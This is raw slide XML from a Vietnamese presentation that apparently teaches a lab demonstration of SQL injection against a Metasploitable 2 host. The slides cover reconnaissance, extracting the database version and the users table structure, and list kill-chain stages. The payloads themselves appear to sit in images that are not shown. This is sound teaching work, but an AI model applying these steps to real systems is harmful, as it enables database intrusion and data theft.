                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C113B11F-CEAE-2F50-D49B-D69B8E735953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rích xuất version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ết quả cho ta thấy database sử dụng phiên bản </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5.0.51a-3ubuntu5.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F06E9219-0B3F-6A62-5875-4755F45CF82C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939628" y="2074359"/>
            <a:ext cx="7264743" cy="3475518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898ADE8E-C2B2-1086-5DE3-9AAF2DF33DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1956485" y="1700090"/>
            <a:ext cx="5231027" cy="445500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12647023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F90EB-269F-AECA-8218-64E5B0A9598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46B98DA-12F1-12A6-F406-34BB164B91CC}"/>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F0727067-E339-637D-611F-51E7F1E5DB02}"/>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24AF72B0-0DF4-871D-FECE-800DA313E88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106</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961CC36C-BC79-DEFD-412A-5F0964B41551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Sử dụng 1 lệnh tinh vi hơn để trích xuất thông tin cấu trúc bảng users. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33661D6A-05AA-FFF9-D327-82AE32B29C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1237735" y="2556466"/>
            <a:ext cx="6668530" cy="3049143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90232D2-2A0D-7A67-0628-902E5E2036CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663336" y="1783298"/>
            <a:ext cx="5817327" cy="737127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25421677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8020F-918C-7250-6AA2-A8CCB7D96B6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279AD10-088A-49B3-C080-E4CED97FAFC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139BFBBD-3921-4995-C221-914A8249925F}"/>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27D09402-5DB4-2FFF-0F91-7E194EC71C4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107</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE1399A-E18B-7AD9-D01E-9C565366E709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>
            <a:ext cx="8915400" cy="566821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224F198B-4B9F-82F5-BB17-58E055AF875D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="306654" y="1080541"/>
            <a:ext cx="8530691" cy="916850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CB1E17-AC1F-FD27-4201-611BA7F748E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676399" y="2160506"/>
            <a:ext cx="5791200" cy="3192521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239728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7EE8F-8187-D105-10B2-7471029783E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AA4B659-F1E1-85DF-4513-942DBE8AE5A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8D279F45-82A3-2489-6585-A10926762828}"/>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2DFFE16C-9FAC-EF8C-1DE0-CE43961BFC6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108</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E24EE33-3630-8054-F157-5E5F453DBC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>
            <a:ext cx="8915400" cy="566821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D249EA8F-914B-263B-CFF6-1E08F102CCB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-28194" y="909342"/>
            <a:ext cx="9172194" cy="566821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE81ACBE-0251-ED2A-D6DC-F9E79FEC94A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1700424"/>
            <a:ext cx="6705600" cy="3822216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22307957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BC07D-602B-1BFE-EF55-77889BFC4B0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333AD7-BAEB-1F95-01C9-C04ABEC6BEE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39A5F73-425B-2C11-1584-11ADBEED1EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.	Mô phỏng các bước thực hiện demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.	Tấn Công SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3EF86BE-2D26-5E19-0D19-AEFDB8D6F8C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109</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577AA313-793E-51B9-AD65-9347F271AD4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2489240"/>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3.3.1.1. Giai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thám</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> tin (Reconnaissance and Sniffing): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sau khi do thám mạng, địa chỉ 192.168.164.129 được xác định là máy chủ Metasploitable 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1354073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608E7-4F24-F73D-892D-173A559A98B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C7E8980-A98D-A128-674C-1E4BEFCAD3CD}"/>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9C83AB6B-DB4E-CE29-3D28-A947C0FC73AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> bao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>gồm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>giai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cốt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A408B06D-107E-4992-3603-5FC7D9FE3EE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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A775A42-AAE1-BC03-1D71-D1FCD49F577E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1638300"/>
            <a:ext cx="8229600" cy="297773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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Reconnaissance (Trinh sát): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thu thập thông tin về mục tiêu, tìm kiếm lỗ hổng và điểm yếu (ví dụ: quét hệ thống hoặc gửi email lừa đảo).</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2. Weaponization (Vũ khí hóa): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tạo ra công cụ tấn công tùy chỉnh (kết hợp malware với exploit) để tạo ra payload hiệu quả.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36507074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70D84-ED38-D7E5-7263-35803069DAF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9F8F45-5D33-BFFB-EE9B-2E16F764DE8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45FA9D7C-0984-3CF2-7AA0-43FDEAD42823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.	Mô phỏng các bước thực hiện demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.	Tấn Công SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17CA894-53CD-9D37-14A2-B04701C7D50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110</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2EB593C-1055-DCDB-7EDE-F655C9DA32B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2489240"/>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Giai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> do </a:t>
            </a:r>
            <a:r>
